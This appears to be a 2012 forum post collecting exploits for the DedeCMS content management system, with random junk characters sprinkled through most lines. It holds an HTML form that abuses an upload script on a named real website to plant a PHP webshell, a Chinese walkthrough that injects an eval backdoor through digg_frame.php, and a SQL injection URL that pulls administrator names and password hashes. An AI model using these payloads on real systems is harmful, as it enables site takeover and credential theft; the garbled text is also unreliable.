' {0 ~& S, ]7 t( G8 L8 Y9 V<html>4 L6 t. Y! L: `8 U! T, n( R
<head>
1 K4 Q/ z! H: o1 Z<title>Dedecms v55 RCE Exploit Codz By flyh4t</title># e( O1 Y7 K' U! S
</head>0 K/ |* B% R* I- r1 R" i
<body style="FONT-SIZE: 9pt">1 n1 p" k" c) M2 N
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />! V1 I% S! v, k, a9 w0 E# L
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'># i4 {4 i* ?& h5 \. `8 u
<input type='hidden' name='activepath' value='/data/cache/' />5 m' p0 X2 ~3 C
<input type='hidden' name='cfg_basedir' value='../../' />7 K1 ?, n" r5 Z% g
<input type='hidden' name='cfg_imgtype' value='php' />, F2 R" `# c+ _& u/ ^3 X6 a4 I
<input type='hidden' name='cfg_not_allowall' value='txt' />
% O; C% k( V7 C! |& g<input type='hidden' name='cfg_softtype' value='php' />: `3 u3 X! ` {/ z# P6 ]: y
<input type='hidden' name='cfg_mediatype' value='php' />
J5 K/ c5 c9 ^6 T5 u<input type='hidden' name='f' value='form1.enclosure' />: {" C% E) N* [
<input type='hidden' name='job' value='upload' />) A1 Q& l! R; \( a+ A) `+ ~8 S" y- m
<input type='hidden' name='newname' value='fly.php' />6 n ]% F" T+ c* |
Select U Shell <input type='file' name='uploadfile' size='25' />
, `( E; ?4 L, w" `<input type='submit' name='sb1' value='确定' />. I1 A4 V- }3 ]% i( W! h
</form>
3 P `( a% ]8 F1 B! c3 |, o T4 F<br />It's just a exp for the bug of Dedecms V55...<br />, C0 D/ G5 M- ?1 g, k1 k# A
Need register_globals = on...<br /> ~5 |+ L. p2 M; ?* v
Fun the game,get a webshell at /data/cache/fly.php...<br />. F {/ `: f+ q
</body>* X+ P% U, b! m1 I
</html>
0 [- U( {+ z" E- B5 X1 n8 g0 E# i$ ]: G. F4 s
o; d9 h2 o4 L0 Q- s8 n) o5 T" D/ h4 ?) s
4 F5 ?+ I0 q" ^3 k. x% H# S# `% H) L) ] H
3 {4 M) H$ f$ J
/ [8 n |" \ P9 L3 [/ i8 ~
+ c# f: Z' k$ d' i- d. R3 N- p& w2 {' K$ X
& j' U. ~% Z1 K; u
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
6 \% V0 k2 r3 N" M8 E) `利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
- r! K, d6 X# j! g, Z( c1. 访问网址:
% j+ o: O& w" |# c4 Whttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?># @. v4 N* G- C- ]
可看见错误信息6 I0 g0 T: z) O0 \
! M' B; Z* _9 A% w$ ]' N1 X% Q+ ]0 w* Q( Z0 H- ^
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
9 `, V) ~7 A" |) J, eint(3) Error: Illegal double '1024e1024' value found during parsing
; ?1 l$ L# l% x* h% vError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?> n3 f2 F B% V" Y; l- k
- f! ^" W8 A/ \$ [# K
, D4 D0 D9 f, u. g4 i- r3 L3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是* c5 m$ a4 R7 i
& f' c& z( s, [4 T8 H+ n- R# c
0 A* h1 D7 S. D# B7 C e7 C2 h7 y
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>3 r4 {+ ]0 W3 S6 w; r/ G4 s3 |7 h# X
, s' A+ V% i# b3 } Q5 S
4 F- W. Q0 k9 `: e) T2 A
按确定后的看到第2步骤的信息表示文件木马上传成功., P; A8 {& N3 P" r
% f5 a# W) t; i4 g% @9 o
) q6 T. g2 I# s* b1 e% d6 w- S5 j$ ` j* R& H) ~" C
& T; S& j6 R( v: e) v7 A+ I+ J9 O1 J5 j2 C# R
% a% J* y* Z$ o% @/ L! V' {* e |+ h4 {) ~* \7 W
: J. i1 h' d( @+ y9 C
9 y2 U$ n! O" h1 m4 F
/ }$ `* @1 }6 ?9 L7 S% s I2 ]8 r" o( s
3 {' |2 ~) I$ q, e织梦(DedeCms)plus/infosearch.php 文件注入漏洞
! e6 F G& A% P' Y5 q, H6 |7 jhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
分享
支持
反对